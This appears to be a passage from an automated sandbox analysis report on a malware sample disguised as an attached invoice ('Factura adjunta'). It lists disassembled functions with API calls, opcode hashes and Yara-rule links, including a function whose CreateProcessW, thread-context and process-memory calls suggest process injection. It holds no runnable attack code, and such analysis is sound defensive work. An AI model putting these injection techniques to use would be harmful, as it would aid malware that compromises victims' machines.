                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: File$CloseCreateHandleTime
                            • String ID:
                            • API String ID: 3397143404-0
                            • Opcode ID: 366650ba7f7066445d03019b86aca6c6cf5b382ad71f857efd137e4f36fb8204
                            • Instruction ID: 7a0467c2b559922a0f300e30514cc3412d4f67066ccfa7fde35d92050f52ba31
                            • Opcode Fuzzy Hash: 366650ba7f7066445d03019b86aca6c6cf5b382ad71f857efd137e4f36fb8204
                            • Instruction Fuzzy Hash: FEE08632580324B7D7221B54FC09FDE7B18FB45771F104620FB54A90E187B1251197D8
                            Function 00818F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                            • _free.LIBCMT ref: 00818FA5
                              • Part of subcall function 007D2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,007D9C64), ref: 007D2FA9
                              • Part of subcall function 007D2F95: GetLastError.KERNEL32(00000000,?,007D9C64), ref: 007D2FBB
                            • _free.LIBCMT ref: 00818FB6
                            • _free.LIBCMT ref: 00818FC8
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                            • Instruction ID: c951ac08218568376b4d55d7c376bc4efcdf8c79462b75920e6a20d442b681f6
                            • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                            • Instruction Fuzzy Hash: 38E012A1609701CACA24A678AD45ED757FEAF483507280C1EB409DB243DF28E8838124
                            Function 007BAB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID:
                            • String ID: CALL
                            • API String ID: 0-4196123274
                            • Opcode ID: 24b2d46fce3c96d908181288da9c9ea6ab5c4f39e22d2aa30fddbef1580964bc
                            • Instruction ID: e0aeedb9db4d71a947d487925d7a9d8cab9d2f24a3f93752280797aec0ab909f
                            • Opcode Fuzzy Hash: 24b2d46fce3c96d908181288da9c9ea6ab5c4f39e22d2aa30fddbef1580964bc
                            • Instruction Fuzzy Hash: 0A224870608245DFC724EF14C494BAABBE1FF44300F15895DE99A8B362D779EC85CB82
                            Function 007B4DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID: EA06
                            • API String ID: 4104443479-3962188686
                            • Opcode ID: 3da1b60c673ded06d68d557b93ac7bc78b695efdc62c3826d23d0c4eb78eb3e0
                            • Instruction ID: 572e1fd7409107b9ff9f714b48065771cc6a2fe8ff55c962bc77995e20a50aef
                            • Opcode Fuzzy Hash: 3da1b60c673ded06d68d557b93ac7bc78b695efdc62c3826d23d0c4eb78eb3e0
                            • Instruction Fuzzy Hash: 27416B71A04194ABDF219F6488697FE7FB6AF45300F684165F882DB283C63DDD4487E1
                            Function 007B492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                            Download Yara Rule
                            APIs
                            • 74A3C8D0.UXTHEME ref: 007B4992
                              • Part of subcall function 007D35AC: __lock.LIBCMT ref: 007D35B2
                              • Part of subcall function 007D35AC: RtlDecodePointer.NTDLL(00000001), ref: 007D35BE
                              • Part of subcall function 007D35AC: RtlEncodePointer.NTDLL(?), ref: 007D35C9
                              • Part of subcall function 007B4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 007B4A73
                              • Part of subcall function 007B4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007B4A88
                              • Part of subcall function 007B3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007B3B7A
                              • Part of subcall function 007B3B4C: IsDebuggerPresent.KERNEL32 ref: 007B3B8C
                              • Part of subcall function 007B3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,008762F8,008762E0,?,?), ref: 007B3BFD
                              • Part of subcall function 007B3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 007B3C81
                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007B49D2
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$DebuggerDecodeEncodeFullNamePathPresent__lock
                            • String ID:
                            • API String ID: 2688871447-0
                            • Opcode ID: ebfde189ff148c6e779983c72a91cea7b2cce81f27502d52d4abceeaaed313cb
                            • Instruction ID: 02de27bacc09b86acf44d216d5185965a942e3f6af58f329ad1e8d20a105f403
                            • Opcode Fuzzy Hash: ebfde189ff148c6e779983c72a91cea7b2cce81f27502d52d4abceeaaed313cb
                            • Instruction Fuzzy Hash: 61118C719183119BC300DF28EC09A4ABBF8FF95710F00891EF259932B2EB74D594CB96
                            Function 007B5DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,007B5981,?,?,?,?), ref: 007B5E27
                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,007B5981,?,?,?,?), ref: 007EE19C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 70da871f8531691b4e7db92e15761e2c6726317b0ce4ad96d2a0fa807a4b812e
                            • Instruction ID: dc4fbd14a570bc35946eaf4210cc57e67d2d019a5d69257b24d58a826abdf37e
                            • Opcode Fuzzy Hash: 70da871f8531691b4e7db92e15761e2c6726317b0ce4ad96d2a0fa807a4b812e
                            • Instruction Fuzzy Hash: DA019270244708BEF3250E24DC8AFB67A9CAB05768F108718BAE56E1E0C6F85E458B50
                            Function 007D582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: __lock_file_memset
                            • String ID:
                            • API String ID: 26237723-0
                            • Opcode ID: 04f6d873f319eb8f359d3eec6c31419536e29459330dd4ca95864bc11217ef31
                            • Instruction ID: a3ee07bdc632260e6c4ab852b5ae3be181737feceb6e0abb5acc25fb6b030ff9
                            • Opcode Fuzzy Hash: 04f6d873f319eb8f359d3eec6c31419536e29459330dd4ca95864bc11217ef31
                            • Instruction Fuzzy Hash: A5014471800609EBCF52AF698C0A99E7B71AF44760F148217B8245A3A1DB39CA51EB92
                            Function 007D55D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007D8D68: __getptd_noexit.LIBCMT ref: 007D8D68
                            • __lock_file.LIBCMT ref: 007D561B
                              • Part of subcall function 007D6E4E: __lock.LIBCMT ref: 007D6E71
                            • __fclose_nolock.LIBCMT ref: 007D5626
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                            • String ID:
                            • API String ID: 2800547568-0
                            • Opcode ID: 035f812272a873cc09340d8a4013578faa75dac58c62a93ce25ee057136d4515
                            • Instruction ID: 6e4154b8bbcdf5ce53be435a90286133541d56be8f2f8da6c1714495d53c38f0
                            • Opcode Fuzzy Hash: 035f812272a873cc09340d8a4013578faa75dac58c62a93ce25ee057136d4515
                            • Instruction Fuzzy Hash: EEF0BE71900A04DBDB61BF79880AB6E77B16F40B34F65820BA425AB3C1CF7CCA019B56
                            Function 0076129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                            Download Yara Rule
                            APIs
                            • CreateProcessW.KERNELBASE(?,00000000), ref: 00761ACD
                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00761AF1
                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00761B13
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198887255.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_760000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                            • String ID:
                            • API String ID: 2438371351-0
                            • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                            • Instruction ID: 5f65a98db238beb5b6d3c40d11eebc2cfd44f73e7bc69ca33dc5e04b347a397a
                            • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                            • Instruction Fuzzy Hash: FE12CD24E24658C6EB24DF64D8547DEB232EF68300F1090E9910DEB7A5E77A4F81CF5A
                            Function 007C2123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ea1dfc0ec95d55d920a0d326904cac450b380cf8ea09e8281b8bb8bfbb9e62a3
                            • Instruction ID: 317027686197f33108f02b5f284f739fd29168325db35761e09a7b39b80e1f36
                            • Opcode Fuzzy Hash: ea1dfc0ec95d55d920a0d326904cac450b380cf8ea09e8281b8bb8bfbb9e62a3
                            • Instruction Fuzzy Hash: EC517C34700604EFCF14EB68C995FAE77A6AF85310F15806CFA06AB392DA38ED018B51
                            Function 007B5C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                            Download Yara Rule
                            APIs
                            • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 007B5CF6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: FilePointer
                            • String ID:
                            • API String ID: 973152223-0
                            • Opcode ID: 46fbcb3221960901cbceb31f6da3df919c1163380ff6c6eab6ed9387f1acd363
                            • Instruction ID: 2f0e34166f95fb0272ec08fce07dea22d31e92f4055310e591c154a432bb55a7
                            • Opcode Fuzzy Hash: 46fbcb3221960901cbceb31f6da3df919c1163380ff6c6eab6ed9387f1acd363
                            • Instruction Fuzzy Hash: C8311C71A00B1AABCB18DF6DC4847ADBBB6FF48310F148629E81993750D775B950DB90
                            Function 007F00D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ClearVariant
                            • String ID:
                            • API String ID: 1473721057-0
                            • Opcode ID: 4ece200a48d884ab80a78f760cfd73872c20d977d30a6b4603ca1cd9366935fb
                            • Instruction ID: 758a0d337faea6dee3fa052f8f1b4667b29228216a461a9cf38b939ae6e5461f
                            • Opcode Fuzzy Hash: 4ece200a48d884ab80a78f760cfd73872c20d977d30a6b4603ca1cd9366935fb
                            • Instruction Fuzzy Hash: 6B410974604345DFDB24DF14C488B5ABBE1BF45318F19889CE9994B362C37AEC45CB92
                            Function 007B5B19 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: 96b9f5cc97cbdda0c5a961189dbe70e0d9e8e7c2c0916fbe0c5660ea70228b86
                            • Instruction ID: cfb2f29d23107ef4c2fb3ff18893654d415cdb0fd35d4f4923e3a6709f47f06a
                            • Opcode Fuzzy Hash: 96b9f5cc97cbdda0c5a961189dbe70e0d9e8e7c2c0916fbe0c5660ea70228b86
                            • Instruction Fuzzy Hash: 35212170A00A48EBCF105F92E8847AA7FB8FF08350F32886AE485C1511FBB884E0DB41
                            Function 007B4F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B4D13: FreeLibrary.KERNEL32(00000000,?), ref: 007B4D4D
                              • Part of subcall function 007D548B: __wfsopen.LIBCMT ref: 007D5496
                            • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,008762F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007B4F6F
                              • Part of subcall function 007B4CC8: FreeLibrary.KERNEL32(00000000), ref: 007B4D02
                              • Part of subcall function 007B4DD0: _memmove.LIBCMT ref: 007B4E1A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Library$Free$Load__wfsopen_memmove
                            • String ID:
                            • API String ID: 1396898556-0
                            • Opcode ID: 4025b2326dff1c990b954fd42d144bbcae333eb15dbed2445b0a46efb5d47c99
                            • Instruction ID: 96ff29ad46a27a8580c6321c1fe299a06a21d40441166b0cfd60bd785194ebb2
                            • Opcode Fuzzy Hash: 4025b2326dff1c990b954fd42d144bbcae333eb15dbed2445b0a46efb5d47c99
                            • Instruction Fuzzy Hash: 6111C432700209EACF20FF70CC1ABEE77A99F44710F108429F541A7283DA799A059BA1
                            Function 007F01AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ClearVariant
                            • String ID:
                            • API String ID: 1473721057-0
                            • Opcode ID: ac74bf817b4af21a5d02c0c26ea2ead9103dbd66d73a954fe92c8822c067ccd1
                            • Instruction ID: 83d66e81843c61467ce77f5fb26cb80c734e20b478b3087cbffb3cdfea6887b7
                            • Opcode Fuzzy Hash: ac74bf817b4af21a5d02c0c26ea2ead9103dbd66d73a954fe92c8822c067ccd1
                            • Instruction Fuzzy Hash: F3212674608341EFCB14EF54C445B5ABBF0BF84314F05896CE98947722D739E849CBA2
                            Function 007B5D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                            Download Yara Rule
                            APIs
                            • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,007B5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 007B5D76
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: 08efe224d5888e7976cb006d9abe1fe616f1b9573dd0d4d67fb12c7375f38a42
                            • Instruction ID: 92a7f9742c38ca11baa2f35ab4b6ef046266e918793251757c60f49e37f6ea7a
                            • Opcode Fuzzy Hash: 08efe224d5888e7976cb006d9abe1fe616f1b9573dd0d4d67fb12c7375f38a42
                            • Instruction Fuzzy Hash: C8113631200B019FD3308F15D888BA6B7E9FF45760F10CA2EE5AA86A50D7B9E945CF60
                            Function 007B5BDA Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: 9b54afcf07a23b9ff4e0bf05bec20c5cd47f57aecc711df460a32f44145caaaf
